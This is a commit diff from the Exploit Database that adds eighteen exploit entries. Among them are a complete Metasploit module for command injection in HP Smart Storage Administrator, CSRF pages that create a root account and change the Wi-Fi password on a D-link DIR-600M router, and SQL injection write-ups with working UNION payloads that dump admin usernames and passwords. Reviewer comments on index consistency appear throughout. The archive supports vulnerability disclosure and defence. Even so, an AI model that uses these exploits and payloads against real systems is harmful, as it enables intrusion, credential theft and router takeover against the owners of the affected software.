DB: 2017-02-11

18 new exploits

Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)
F5 BIG-IP SSL Virtual Server - Memory Disclosure
CMS Lite 1.3.1 - SQL Injection
Tiger Post 3.0.1 - SQL Injection
Gram Post 1.0 - SQL Injection
Youtube Analytics Multi Channel 3.0 - SQL Injection
Collabo - Arbitrary File Download
Takas Classified 1.1 - SQL Injection
Zigaform - SQL Injection
Multilanguage Estate Agency Pro 1.2 - SQL Injection
QWIKIA 1.1.1 - SQL Injection
Automated Job Portal Script - SQL Injection
CLUB-8 EMS - SQL Injection
Uploadr - SQL Injection
CodePaul ClipMass - SQL Injection
Video Subscription - SQL Injection
D-link DIR-600M - Cross-Site Request Forgery
HotelCMS with Booking Engine - SQL Injection
Offensive Security 2017-02-11 05:01:16 +00:00
parent a6133048b5
commit dcc7720ad6
19 changed files with 586 additions and 1 deletions


@ -8600,7 +8600,7 @@ id,file,description,date,author,platform,type,port
39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0
39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0
39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0
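Review bot: In the retitled 39719 row, "Windows 7 < 10 / Server 2008 < 2012 R2" still uses "<" as a range separator, which reads as "earlier than" and does not say whether Windows 10 and Server 2012 R2 themselves are affected. The range is the only thing this row changes, so spell it out (for example "7 through 10") so the row can be matched against an asset inventory without opening 39719.ps1.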
@ -15264,6 +15264,8 @@ id,file,description,date,author,platform,type,port
41162,platforms/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote,0
41233,platforms/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,linux,remote,0
41236,platforms/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,hardware,remote,0
41297,platforms/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,multiple,remote,0
41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
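Review bot: The new 41298 row describes the issue only as "F5 BIG-IP SSL Virtual Server - Memory Disclosure"; the CVE id and the Ticketbleed name appear in the title line of 41298.txt but not here. Add "(CVE-2016-9244)" or the name to the description column so a search of the index by CVE finds the row.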
@ -37209,3 +37211,19 @@ id,file,description,date,author,platform,type,port
41286,platforms/php/webapps/41286.txt,"SOA School Management - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41291,platforms/php/webapps/41291.txt,"Tiger Post 3.0.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41292,platforms/php/webapps/41292.txt,"Gram Post 1.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41293,platforms/php/webapps/41293.txt,"Youtube Analytics Multi Channel 3.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41294,platforms/php/webapps/41294.txt,"Collabo - Arbitrary File Download",2017-02-10,"Ihsan Sencan",php,webapps,0
41295,platforms/php/webapps/41295.txt,"Takas Classified 1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41296,platforms/php/webapps/41296.txt,"Zigaform - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41300,platforms/php/webapps/41300.txt,"Multilanguage Estate Agency Pro 1.2 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41301,platforms/php/webapps/41301.txt,"QWIKIA 1.1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41302,platforms/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41303,platforms/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41304,platforms/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41305,platforms/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41306,platforms/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
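Review bot: The description for 41296 reads "Zigaform - SQL Injection" with no version, although 41296.txt in this commit gives 2.9.1 and neighbouring rows such as "CMS Lite 1.3.1" carry theirs; likewise the 41306 row drops the "TV" prefix that the file title uses. Bring both rows in line with the file titles so index searches by product and version match.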


@ -0,0 +1,12 @@
/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege Balcı]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip
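Review bot: Nothing in this file says what the issue is or how to tell whether a device is fixed; after the header the only content is a link to a zip held in a different repository, so the entry cannot be reviewed from this diff. Add a short summary and a vendor advisory reference under the header, and write the "Version" line as two plain ranges rather than joining them with "&&".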


@ -0,0 +1,92 @@
# Exploit Title:D-link wireless router DIR-600M Cross-Site Request Forgery (CSRF) vulnerability
# Google Dork:N/A
# Date: 07/02/2017
# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
# Vendor Homepage:dlink.com
# Software Link:N/A
# Version:Hardware version: C1
Firmware version: 3.03
# Tested on:All Platforms
# CVE :CVE-2017-5874
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker
to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
Details:
=======
An attacker who lures a DIR-600M authenticated user to browse a malicious website
can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
Proof Of Concept code:
====================
1. Add new user with root access
<html>
<!-- CSRF PoC - by Ajay Kulal -->
<body>
<form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
<input type="hidden" name="username" value="AK" />
<input type="hidden" name="privilege" value="2" />
<input type="hidden" name="newpass" value="dolphin" />
<input type="hidden" name="confpass" value="dolphin" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. changing wireless password
<html>
<!-- CSRF PoC - by Ajay Kulal -->
<body>
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="Dravidian" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="0" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method&#95;cur" value="0" />
<input type="hidden" name="method" value="2" />
<input type="hidden" name="authType" value="2" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="password123" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
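Review bot: The file is added as 41299.html but opens with "#" metadata lines and plain-text sections and then holds two complete <html> documents, so it is not a valid HTML file; store it as .txt or move the header into an HTML comment. In the header, "Firmware version: 3.03" has lost its "#" prefix, and "Exploitation-Technique: Remote" disagrees with the AV:A (adjacent network) in the severity vector. The write-up also gives no fix status or fixed firmware version, which is what an owner of this router would look for first.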


@ -0,0 +1,178 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "HP Smart Storage Administrator Remote Command Injection",
'Description' => %q{
This module exploits a vulnerability found in HP Smart Storage Administrator. By
supplying a specially crafted HTTP request, it is possible to control the
'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Mattiocco (@MaKyOtOx)' # Discovery & multi-platform Metasploit module
],
'References' =>
[
['CVE', '2016-8523']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => %w{ linux win },
'Targets' =>
[
['Linux', {
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'bourne'
}],
['Linux (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'bourne'
}],
['Windows', {
'Platform' => 'win',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'certutil'
}],
['Windows (x64)', {
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'certutil'
}],
],
'Privileged' => false,
'DisclosureDate' => "Jan 30 2017"
))
register_options(
[
Opt::RPORT(2381),
# USERNAME/PASS may not be necessary, because the anonymous access is possible
OptString.new("USERNAME", [false, 'The username to authenticate as']),
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
], self.class)
end
def check
@cookie = ''
sig = Rex::Text.rand_text_alpha(8)
cmd = "&echo%20#{sig}&echo"
res = send_command(cmd, true)
if not res
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.code == 200 && res.headers.to_s() =~ /#{sig}/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/proxy/ssllogin',
'vars_post' => {
'redirecturl' => '',
'redirectquerystring' => '',
'user' => username,
'password' => password
}
})
if not res
fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
end
# CpqElm-Login: success
if res.headers['CpqElm-Login'].to_s =~ /success/
cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
end
cookie
end
def setup_stager
execute_cmdstager(:temp => './', :linemax => 2800)
end
def execute_command(cmd, opts={})
res = send_command(cmd, false)
if res && res.code != 200
vprint_error("Unexpected response:\n#{res}")
fail_with(Failure::Unknown, "There was an unexpected response")
end
end
def send_command(cmd, check)
if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
@cookie = login
if @cookie.empty?
fail_with(Failure::NoAccess, "#{peer} - Login failed")
else
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
end
end
req_opts = {}
# For the check() function, use GET method
if check
req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
req_opts['method'] = "GET"
else
req_opts['uri'] = "/HPSSA/index.htm"
req_opts['method'] = "POST"
req_opts['vars_post'] = {'msf'=>'red'}
case target.opts['Platform']
when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
when "win" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
end
end
unless @cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
end
send_request_cgi(req_opts)
end
def exploit
@cookie = ''
setup_stager
end
end
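Review bot: The 'Description' text says "Versions prior to HP SSA 2.60.18.0 are vulnerable", while the index row added for this module (41297) titles it "HP Smart Storage Administrator 2.30.6.0". Someone checking exposure from the index alone would read 2.30.6.0 as the only affected build; state the fixed-version boundary in one place and make the other agree with it.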

18
platforms/php/webapps/41290.txt Executable file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Creative Management System - CMS Lite v1.3.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://www.cmslite.co.uk/
# Software Buy: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
# Demo: http://www.cmslite.co.uk/
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?Style=[SQL]
# Etc...
# # # # #

20
platforms/php/webapps/41291.txt Executable file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Tiger Post - Facebook Auto Post Multi Pages/Groups/Profiles v3.0.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://vtcreators.com/
# Software Buy: https://codecanyon.net/item/tiger-post-facebook-auto-post-multi-pagesgroupsprofiles/15279075
# Demo: http://demo.vtcreators.com/tigerpost/
# Version: 3.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
# -999'+/*!50000union*/+select+1,2,3,4,group_concat(email,char(58),password),0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_management-- -
# Etc...
# # # # #

20
platforms/php/webapps/41292.txt Executable file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Gram Post - Instagram Auto Post Multi Accounts with Paypal integration v1.0 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://vtcreators.com/
# Software Buy: https://codecanyon.net/item/gram-post-instagram-auto-post-multi-accounts-with-paypal-integration/19264650
# Demo: http://demo.vtcreators.com/grampost/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/instagram_accounts/update?id=[SQL]
# -9999'+/*!50000union*/+select+group_concat(email,char(58),password),2,3,4,5,6+from+user_management-- -
# Etc...
# # # # #

19
platforms/php/webapps/41293.txt Executable file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://vtcreators.com/
# Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919
# Demo: http://demo.vtcreators.com/yamc/
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
# Etc...
# # # # #

19
platforms/php/webapps/41294.txt Executable file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Collabo - TeamBusiness Collaboration Network - Arbitrary File Download
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://321-internet.com/
# Software Buy: https://codecanyon.net/item/collabo-teambusiness-collaboration-network/15242543
# Demo: http://321-internet.com/codecanyon/collabo/demo/collabo/index.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# Login as regular user
# http://localhost/[PATH]/download.php?file_id=[FILE]&file_name=Ihsan_Sencan&file_type=php
# Etc...
# # # # #

23
platforms/php/webapps/41295.txt Executable file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Takas Classified Codeigniter PHP Classified Ad Script v1.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://artifectx.com/
# Software Buy: https://codecanyon.net/item/takas-classified-codeigniter-php-classified-ad-script/15227824
# Demo: http://takas.artifectx.com/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/classified_ads/ads/?&subcatid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&catid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&locid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&areaid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&type=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&post=[SQL]
# Etc... Etc...
# # # # #

18
platforms/php/webapps/41296.txt Executable file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Zigaform - PHP Form Builder - Contact & Survey v2.9.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://php-form-builder.zigaform.com/
# Software Buy: https://codecanyon.net/item/zigaform-php-form-builder-contact-survey/14889427
# Demo: http://demo-phpformbuilder.zigaform.com/index.php
# Version: 2.9.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL]
# Etc...
# # # # #

17
platforms/php/webapps/41300.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Multilanguage Estate Agency Pro 1.2 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://djrust26.hu/
# Software Buy: https://codecanyon.net/item/multilanguage-estate-agency-pro-12/14521069
# Demo: http://djrust26.hu/realestate/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/property_show.php?id=[SQL]
# # # # #

17
platforms/php/webapps/41301.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: QWIKIA - Ask And Answer Platform 1.1.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://xandr.co/
# Software Buy: http://xandr.co/portfolio/qwikia
# Demo: http://qwikia.xandr.co/
# Version: 1.1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?q=[SQL]
# # # # #

23
platforms/php/webapps/41302.txt Executable file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Automated Job Portal Script - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://www.jagaad.com/
# Software Buy: https://codecanyon.net/item/automated-job-portal-script/14318664
# Demo: http://www.jagaad.com/demo/php/automated-job-portal/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/jobdetail.php?id=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
#
# http://localhost/[PATH]/search.php?keyword=1&location=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
#
# http://localhost/[PATH]/search.php?keyword=a&location=&co=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
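Review bot: The three query strings that follow the URL lines are not prefixed with "#" and the file ends without the closing "# # # # #" line, unlike 41291.txt and 41292.txt in this commit where every line is a comment. Prefix them and add the footer so the entry format stays consistent across the batch; "Version: N/A" also leaves a reader unable to tell which releases are affected.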

22
platforms/php/webapps/41303.txt Executable file

@ -0,0 +1,22 @@
# # # # #
# Exploit Title: CLUB-8 EMS - Event Management System - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://rexbd.net/
# Software Buy: https://codecanyon.net/item/club8-ems-event-management-system-a-to-z/14067759
# Demo: http://ems.rexbd.net/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as sales man user
# http://localhost/[PATH]/editwatch.php?id=[SQL]
-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
#
# http://localhost/[PATH]/editwatch.php?id=[SQL]
-999'+/*!50000union*/+select+1,group_concat(username,char(58),password)+from+users-- -
# # # # #
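Review bot: Both cases name the same URL, editwatch.php?id=, yet the two queries beneath them select different numbers of columns (14 and 2), which suggests they belong to different statements and that the second URL is a copy of the first. Name the script the second case applies to, and prefix the two query lines with "#" as the rest of the file does.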

18
platforms/php/webapps/41304.txt Executable file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Uploadr - Project Files Management - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://lagunaproperty.com/
# Software Buy: https://codecanyon.net/item/uploadr-project-files-management/13545125
# Demo: http://download.lagunaproperty.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?keyword=[SQL]
# http://localhost/[PATH]/download?file=[SQL]
# # # # #

17
platforms/php/webapps/41305.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: CodePaul ClipMass - Video Portal Site - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://codepaul.com/
# Software Buy: https://codecanyon.net/item/codepaul-clipmass-video-portal-site/14681505
# Demo: http://codepaul.com/clipmass/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?keyword=[SQL]
# # # # #

17
platforms/php/webapps/41306.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: TV - Video Subscription - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://codepaul.com/
# Software Buy: https://codecanyon.net/item/tv-video-subscription/13966427
# Demo: http://codepaul.com/tv/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?keyword=[SQL]
# # # # #

17
platforms/php/webapps/41307.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: HotelCMS with Booking Engine - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://codepaul.com/
# Software Buy: https://codecanyon.net/item/hotelcms-with-booking-engine/12789671
# Demo: http://codepaul.com/hotelcms/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/locale?locale=[SQL]
# # # # #